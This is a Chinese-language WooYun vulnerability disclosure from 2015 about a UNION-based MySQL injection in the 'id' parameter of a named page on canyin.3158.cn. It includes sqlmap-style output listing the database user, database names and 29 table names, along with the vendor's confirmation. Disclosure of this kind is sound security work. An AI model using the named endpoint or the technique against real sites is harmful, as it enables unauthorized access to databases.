当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098287

漏洞标题:财富中国某站存在一处UNION mysql注入漏洞

相关厂商:财富中国

漏洞作者: Forever80s

提交时间:2015-02-25 16:48

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-25: 细节已通知厂商并且等待厂商处理中
2015-02-26: 厂商已经确认,细节仅向厂商公开
2015-03-08: 细节向核心白帽子及相关领域专家公开
2015-03-18: 细节向普通白帽子公开
2015-03-28: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

看到以前都发送礼物了,才测试一下

详细说明:

网站:

canyin.3158.cn


参数id:

http://canyin.3158.cn/pinlun/?id=1427&formid=hotshop


poc:

current user:    'ncanyinhypdq@127.0.0.1'
available databases [3]:
[*] information_schema
[*] n_hypd_canyin
[*] test
[02:57:17] [INFO] fetching tables for database: 'n_hypd_canyin'
Database: n_hypd_canyin
[29 tables]
+-----------------------------------+
| cpapp_canyin_article |
| cpapp_canyin_article_data |
| cpapp_canyin_category |
| cpapp_canyin_keyword_link |
| cpapp_canyin_link |
| cpapp_canyin_link_category |
| cpapp_canyin_link_position |
| cpapp_canyin_page |
| cpapp_canyin_page_data |
| cpapp_canyin_page_group |
| cpapp_canyin_shard |
| cpapp_canyin_shard_data |
| cpapp_canyin_shard_group |
| cpapp_canyin_site_config |
| cpapp_canyin_special |
| cpapp_canyin_special_article |
| cpapp_canyin_special_article_data |
| cpapp_canyin_special_type |
| cpapp_canyin_tag |
| cpapp_canyin_tag_article |
| cpapp_hotshop |
| cpapp_hotshop_category |
| cpapp_hotshop_comment |
| cpapp_hotshop_data |
| cpapp_recipe |
| cpapp_recipe_category |
| cpapp_recipe_comment |
| cpapp_recipe_data |
| cpapp_recipe_seasoning |
+-----------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 Forever80s@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-02-26 17:30

厂商回复:

感谢!礼物稍后送上!

最新状态:

暂无